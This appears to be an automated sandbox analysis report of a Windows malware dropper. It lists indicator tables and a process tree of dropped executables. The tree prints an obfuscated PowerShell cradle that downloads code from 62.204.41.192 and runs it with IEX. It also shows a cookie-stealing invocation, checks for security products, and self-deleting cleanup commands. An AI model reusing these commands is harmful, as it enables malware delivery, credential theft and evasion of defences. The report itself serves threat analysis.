Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	sotema_3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

jfiag3g_gg.exesotema_2.exejfiag3g_gg.exe

pid	process
1300	jfiag3g_gg.exe
1300	jfiag3g_gg.exe
4736	sotema_2.exe
4736	sotema_2.exe
1352	jfiag3g_gg.exe
1352	jfiag3g_gg.exe
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3024
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

sotema_2.exe

pid process

4736 sotema_2.exe

pid	process
3024

pid	process
4736	sotema_2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

UGloryStp.exesotema_6.exeLpk1DHbkoHvMbmjlG6Ehcuk8.exeCRKwonPHVFzqeBlClm1Iu73t.exe

description	pid	process
Token: SeDebugPrivilege	2292	UGloryStp.exe
Token: SeDebugPrivilege	372	sotema_6.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeCreateTokenPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeAssignPrimaryTokenPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeLockMemoryPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeIncreaseQuotaPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeMachineAccountPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeTcbPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeSecurityPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeTakeOwnershipPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeLoadDriverPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeSystemProfilePrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeSystemtimePrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeProfSingleProcessPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeIncBasePriorityPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeCreatePagefilePrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeCreatePermanentPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeBackupPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeRestorePrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeShutdownPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeDebugPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeAuditPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeSystemEnvironmentPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeChangeNotifyPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeRemoteShutdownPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeUndockPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeSyncAgentPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeEnableDelegationPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeManageVolumePrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeImpersonatePrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeCreateGlobalPrivilege	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: 31	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: 32	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: 33	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: 34	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: 35	2444	Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
Token: SeDebugPrivilege	3388	CRKwonPHVFzqeBlClm1Iu73t.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024

Suspicious use of FindShellTrayWindow 23 IoCs

Processes:

Accostarmi.exe.pif

pid	process
3864	Accostarmi.exe.pif
3024
3024
3864	Accostarmi.exe.pif
3864	Accostarmi.exe.pif
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Accostarmi.exe.pif

pid process

3864 Accostarmi.exe.pif
3864 Accostarmi.exe.pif
3864 Accostarmi.exe.pif
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

U0r5QuazQiYk1kJU4whb_HUC.exe

pid process

2768 U0r5QuazQiYk1kJU4whb_HUC.exe

pid	process
2768	U0r5QuazQiYk1kJU4whb_HUC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exesotema_7.exesotema_6.exesotema_8.exe

description	pid	process	target process
PID 1564 wrote to memory of 2668	1564	6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370.exe	setup_installer.exe
PID 1564 wrote to memory of 2668	1564	6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370.exe	setup_installer.exe
PID 1564 wrote to memory of 2668	1564	6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370.exe	setup_installer.exe
PID 2668 wrote to memory of 4848	2668	setup_installer.exe	setup_install.exe
PID 2668 wrote to memory of 4848	2668	setup_installer.exe	setup_install.exe
PID 2668 wrote to memory of 4848	2668	setup_installer.exe	setup_install.exe
PID 4848 wrote to memory of 4348	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4348	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4348	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 1668	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 1668	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 1668	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 3268	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 3268	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 3268	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4568	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4568	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4568	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4548	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4548	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4548	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4960	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4960	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4960	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4576	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4576	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 4576	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 3744	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 3744	4848	setup_install.exe	cmd.exe
PID 4848 wrote to memory of 3744	4848	setup_install.exe	cmd.exe
PID 4548 wrote to memory of 932	4548	cmd.exe	sotema_5.exe
PID 4548 wrote to memory of 932	4548	cmd.exe	sotema_5.exe
PID 4548 wrote to memory of 932	4548	cmd.exe	sotema_5.exe
PID 4576 wrote to memory of 1212	4576	cmd.exe	sotema_7.exe
PID 4576 wrote to memory of 1212	4576	cmd.exe	sotema_7.exe
PID 4576 wrote to memory of 1212	4576	cmd.exe	sotema_7.exe
PID 4568 wrote to memory of 1376	4568	cmd.exe	sotema_4.exe
PID 4568 wrote to memory of 1376	4568	cmd.exe	sotema_4.exe
PID 4568 wrote to memory of 1376	4568	cmd.exe	sotema_4.exe
PID 3744 wrote to memory of 1268	3744	cmd.exe	sotema_8.exe
PID 3744 wrote to memory of 1268	3744	cmd.exe	sotema_8.exe
PID 3744 wrote to memory of 1268	3744	cmd.exe	sotema_8.exe
PID 1668 wrote to memory of 4736	1668	cmd.exe	sotema_2.exe
PID 1668 wrote to memory of 4736	1668	cmd.exe	sotema_2.exe
PID 1668 wrote to memory of 4736	1668	cmd.exe	sotema_2.exe
PID 3268 wrote to memory of 4720	3268	cmd.exe	sotema_3.exe
PID 3268 wrote to memory of 4720	3268	cmd.exe	sotema_3.exe
PID 3268 wrote to memory of 4720	3268	cmd.exe	sotema_3.exe
PID 4348 wrote to memory of 1416	4348	cmd.exe	sotema_1.exe
PID 4348 wrote to memory of 1416	4348	cmd.exe	sotema_1.exe
PID 4348 wrote to memory of 1416	4348	cmd.exe	sotema_1.exe
PID 4960 wrote to memory of 2428	4960	cmd.exe	sotema_6.exe
PID 4960 wrote to memory of 2428	4960	cmd.exe	sotema_6.exe
PID 4960 wrote to memory of 2428	4960	cmd.exe	sotema_6.exe
PID 1212 wrote to memory of 3172	1212	sotema_7.exe	sotema_7.tmp
PID 1212 wrote to memory of 3172	1212	sotema_7.exe	sotema_7.tmp
PID 1212 wrote to memory of 3172	1212	sotema_7.exe	sotema_7.tmp
PID 2428 wrote to memory of 372	2428	sotema_6.exe	sotema_6.exe
PID 2428 wrote to memory of 372	2428	sotema_6.exe	sotema_6.exe
PID 2428 wrote to memory of 372	2428	sotema_6.exe	sotema_6.exe
PID 1268 wrote to memory of 3484	1268	sotema_8.exe	jhuuee.exe
PID 1268 wrote to memory of 3484	1268	sotema_8.exe	jhuuee.exe
PID 1268 wrote to memory of 3484	1268	sotema_8.exe	jhuuee.exe
PID 1268 wrote to memory of 4480	1268	sotema_8.exe	liuchao.exe

C:\Users\Admin\AppData\Local\Temp\6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370.exe
"C:\Users\Admin\AppData\Local\Temp\6a91a4affa1ec1e4e06492a200ed0365f21a2576f065852944fd7fb362ed1370.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1564

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2668

C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_8.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3744

C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_8.exe
sotema_8.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1268

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3484

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
PID:3688

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1352

C:\Users\Admin\AppData\Local\Temp\liuchao.exe
"C:\Users\Admin\AppData\Local\Temp\liuchao.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:4480

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
7⤵
- Loads dropped DLL
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 600
8⤵
- Program crash
PID:1324

C:\Users\Admin\AppData\Local\Temp\UGloryStp.exe
"C:\Users\Admin\AppData\Local\Temp\UGloryStp.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_7.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4576

C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_7.exe
sotema_7.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_6.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4960

C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_6.exe
sotema_6.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_5.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4548

C:\Users\Admin\AppData\Local\Temp\7zSC6AA301D\sotema_5.exe
sotema_5.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:932

C:\Users\Admin\Documents\Y48EJj8dufnT9we1tGVqxudn.exe
"C:\Users\Admin\Documents\Y48EJj8dufnT9we1tGVqxudn.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4440

C:\Users\Admin\Documents\WBwISM7PVKCw6WhgJPk4TUhF.exe
"C:\Users\Admin\Documents\WBwISM7PVKCw6WhgJPk4TUhF.exe"
6⤵
- Executes dropped EXE
PID:3416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 448
7⤵
- Program crash
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 456
7⤵
- Program crash
PID:5060

C:\Users\Admin\Documents\U0r5QuazQiYk1kJU4whb_HUC.exe
"C:\Users\Admin\Documents\U0r5QuazQiYk1kJU4whb_HUC.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
PID:4488

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
8⤵
PID:3692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NAN.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
PID:3472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
8⤵
PID:4300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 300
9⤵
- Program crash
PID:3740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NON.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
7⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
PID:2556

C:\Users\Admin\Documents\by3DZtmgoKOmTDuD4jfzk6Bt.exe
"C:\Users\Admin\Documents\by3DZtmgoKOmTDuD4jfzk6Bt.exe"
6⤵
PID:648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 440
7⤵
- Program crash
PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 448
7⤵
- Program crash
PID:544

C:\Users\Admin\Documents\Nb7sZIm71uAW16aY7TMFXxad.exe
"C:\Users\Admin\Documents\Nb7sZIm71uAW16aY7TMFXxad.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1832

C:\Users\Admin\Documents\oNFOqOjn97py2MlKDeCY1hkF.exe
"C:\Users\Admin\Documents\oNFOqOjn97py2MlKDeCY1hkF.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1904

C:\Users\Admin\Documents\oNFOqOjn97py2MlKDeCY1hkF.exe
C:\Users\Admin\Documents\oNFOqOjn97py2MlKDeCY1hkF.exe
7⤵
- Executes dropped EXE
PID:3524

C:\Users\Admin\Documents\I95UVzzQH_Np1zTF5NCrVUeL.exe
"C:\Users\Admin\Documents\I95UVzzQH_Np1zTF5NCrVUeL.exe"
6⤵
- Executes dropped EXE
PID:1968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\I95UVzzQH_Np1zTF5NCrVUeL.exe
7⤵
PID:1352

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
8⤵
PID:4040

C:\Users\Admin\Documents\eQd4dlwDLkbVg8ng6skbdIjt.exe
"C:\Users\Admin\Documents\eQd4dlwDLkbVg8ng6skbdIjt.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:2280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
7⤵
PID:4240

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:2980

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
9⤵
- Enumerates processes with tasklist
PID:4712

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4760

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
9⤵
- Enumerates processes with tasklist
PID:3416

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
9⤵
PID:4988

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
9⤵
PID:3668

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3864

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
10⤵
- Executes dropped EXE
PID:4380

C:\Windows\SysWOW64\waitfor.exe
waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
9⤵
PID:464

C:\Users\Admin\Documents\Lpk1DHbkoHvMbmjlG6Ehcuk8.exe
"C:\Users\Admin\Documents\Lpk1DHbkoHvMbmjlG6Ehcuk8.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2444

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:4040

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:2860

C:\Users\Admin\Documents\MzWVkJdId6iLZ0AcuqVLG4cA.exe
"C:\Users\Admin\Documents\MzWVkJdId6iLZ0AcuqVLG4cA.exe"
6⤵
PID:4760

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MzWVkJdId6iLZ0AcuqVLG4cA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\MzWVkJdId6iLZ0AcuqVLG4cA.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:1912

C:\Windows\SysWOW64\taskkill.exe
taskkill /im MzWVkJdId6iLZ0AcuqVLG4cA.exe /f
8⤵
- Kills process with taskkill
PID:2860

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Executes dropped EXE
- Delays execution with timeout.exe
PID:648

C:\Users\Admin\Documents\C96RKHtKpplUJ6ExsB7XDFxn.exe
"C:\Users\Admin\Documents\C96RKHtKpplUJ6ExsB7XDFxn.exe"
6⤵
- Executes dropped EXE
PID:3712

C:\Users\Admin\Documents\6210_9LtpvYIKaRI_Oc3U5iQ.exe
"C:\Users\Admin\Documents\6210_9LtpvYIKaRI_Oc3U5iQ.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:1324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 624
7⤵
- Program crash
PID:4300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 632
7⤵
- Program crash
PID:4300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 636
7⤵
- Program crash
PID:4024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 828
7⤵
- Program crash
PID:624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 900
7⤵
- Program crash
PID:3520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 1260
7⤵
- Program crash
PID:112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 1300
7⤵
- Program crash
PID:680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "6210_9LtpvYIKaRI_Oc3U5iQ.exe" /f & erase "C:\Users\Admin\Documents\6210_9LtpvYIKaRI_Oc3U5iQ.exe" & exit
7⤵
PID:2140

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "6210_9LtpvYIKaRI_Oc3U5iQ.exe" /f
8⤵
- Kills process with taskkill
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 1292
7⤵
- Program crash
PID:2408

C:\Users\Admin\Documents\YRBJOgxXy9BTErub9Ay5ESqt.exe
"C:\Users\Admin\Documents\YRBJOgxXy9BTErub9Ay5ESqt.exe"
6⤵
- Executes dropped EXE
PID:4880

C:\Users\Admin\AppData\Local\Temp\7zS43E.tmp\Install.exe
.\Install.exe
7⤵
- Executes dropped EXE
PID:1160

C:\Users\Admin\AppData\Local\Temp\7zS14C9.tmp\Install.exe
